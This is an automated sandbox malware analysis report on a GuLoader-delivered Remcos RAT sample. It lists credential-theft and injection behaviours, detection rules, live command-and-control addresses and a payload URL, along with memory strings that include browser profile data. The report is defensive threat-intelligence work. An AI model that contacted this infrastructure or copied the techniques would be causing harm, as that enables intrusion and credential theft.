Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe

Overview

General Information

Sample Name:#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
Analysis ID:1332661
MD5:8b1422d6b17dd727c69291aa1ff09481
SHA1:b09ac93ef0313867a755e59cf4b108ee5b376754
SHA256:f08ab03484809d162963cf54a40b81f7722a83984744ecc79f4626b75b829b46
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to steal Mail credentials (via file registry)
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Uses dynamic DNS services
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe (PID: 8164 cmdline: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe MD5: 8B1422D6B17DD727C69291AA1FF09481)
    • wab.exe (PID: 2856 cmdline: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 3368 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngayb MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 1236 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzl MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 5976 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjz MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\paqlgkfs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.49572727235.0000000003718000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe PID: 8164JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
          Process Memory Space: wab.exe PID: 2856JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            Process Memory Space: wab.exe PID: 2856JoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.11.20217.147.225.6950054802855192 10/26/23-14:28:47.709544
              SID:2855192
              Source Port:50054
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:94.156.6.253192.168.11.202402500552032777 10/26/23-14:35:12.486265
              SID:2032777
              Source Port:2402
              Destination Port:50055
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.11.2094.156.6.2535005524022032776 10/26/23-14:28:50.518465
              SID:2032776
              Source Port:50055
              Destination Port:2402
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeVirustotal: Detection: 20%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Antivirus / Scanner detection for submitted sample
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeAvira: detected
              Multi AV Scanner detection for domain / URL
              Source: ourt2949aslumes9.duckdns.orgVirustotal: Detection: 13%Perma Link
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exeAvira: detection malicious, Label: HEUR/AGEN.1338455
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_004059CC
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_004065FD FindFirstFileW,FindClose,5_2_004065FD
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_352D10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352D6580 FindFirstFileExA,7_2_352D6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\paqlgkfs.datJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Temp\bxujegjzJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Temp\rdhzlJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50054 -> 217.147.225.69:80
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50055 -> 94.156.6.253:2402
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50055
              Uses dynamic DNS services
              Source: unknownDNS query: name: ourt2949aslumes9.duckdns.org
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: Joe Sandbox ViewASN Name: GRENA-ASTbilisiGeorgiaGE GRENA-ASTbilisiGeorgiaGE
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 94.156.6.253 94.156.6.253
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficTCP traffic: 192.168.11.20:50055 -> 94.156.6.253:2402
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 00000009.00000003.49631826682.00000000051C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profile{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20","background_apps":false,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_last_name":"Shapira","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_force_signout_state":0,"edge_kids_mode":false,"edge_muid":"243215E5327669D43677068133B66811","edge_previously_signin_user_name":"","edge_signed_in_default_name":33554433,"edge_test_on_premises":false,"edge_
              Source: wab.exe, 00000009.00000003.49635589491.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.49638158012.00000000051CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","do^^d equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000003.49634210398.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49633282564.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49633463217.00000000051C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}} equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000003.49634748141.00000000051C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: N3JOzDAAAAAAIAAAAAABBmAAAAAQAAIAAAAIi9IkqThTzoDjz/SbzVMN6ojv2e+IWxi1hNPZekZpvHAAAAAA6AAAAAAgAAIAAAAAUAxx69p6cLu26Q2Hr4RmGMSdZydqsFEbXDuU/DQjNBMAAAAIjUciIMZJVdhTeHew42TuNasyfPQ/tWU5NsLVjboe0zHjtdzkC5ew1pmiCHlSxe20AAAADHMdJi6EMHqPhkdh83Av+0ljq5qSldx4HBU10VdDSmkAGpjc0ME/dZFvRW/olnz1Fp2nnOVSu6bpN8OhHKse4P"}password_manager{"os_password_blank":false,"os_password_last_changed":"13273675891506321"}plugins{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_types":["application/futuresplash","application/x-shockwave-flash"],"name":"Adobe Flash Player","url":"https://www.adobe.com/products/flashplayer/end-of-life.html","versions":[{"reference":"https://www.adobe.com/products/flashplayer/end-of-life.html","status":"requires_authorization","version":"32.0.0.466"}]},"chromium-pdf":{"group_name_matcher":"*Chromium PDF Viewer*","mime_types":[],"name":"Chromium PDF Viewer","versions":[{"comment":"Chromium PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"chromium-pdf-plugin":{"group_name_matcher":"*Chromium PDF Plugin*","mime_types":[],"name":"Chromium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"x-version":62},"resource_cache_update":"1632306027.441919"}policy{"last_statistics_update":"13335742394458971"}profile:"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","do^^d equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.54485681162.00000000352A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, 00000009.00000003.49631886451.00000000051B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profileANg3Zw2QouYXcOw3P8MgEYmqBohsyHX3A0QYKqCpqgaYKnCaImmJqgaoKr2eaJ8Qu6JvhC8IXgC8EXskfsUsie4Rd8IfhC8IXgC8EXgi8EXwi+EHxhm5eAX/CF4Gudt8rtxcmWHtzKEYrlqfPwGMw8n+fDLltVh7rgekAiRnsBdgY/P4Itiocfnljxe+W2ga1bwbr1j/CS/34+f3++b1IqgQeX2IdvZPSDce7EDIYgeJVNpXPeTKuHZ5yVD9wJ0DceUugUaQm3qtju0YTnB5MKDsADH+gwWG2vonWTUqaj9QFb2Dy/bF7sY6I1n2DJHmpa7A/qg4yb4S6NqPJ9AtKm/5KR8b3rp9+LtsdJcYYVbLtPZTteneEulyXk/54QMpAYEW3NtmiWweguM1wR+XqhTdqDDDBykftettEI9cW4grTMwqccd equals www.facebook.com (Facebook)
              Source: wab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000003.49635884632.00000000051B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login@!id equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000003.49635884632.00000000051B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login@!id equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000009.00000003.49632650714.00000000051C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":
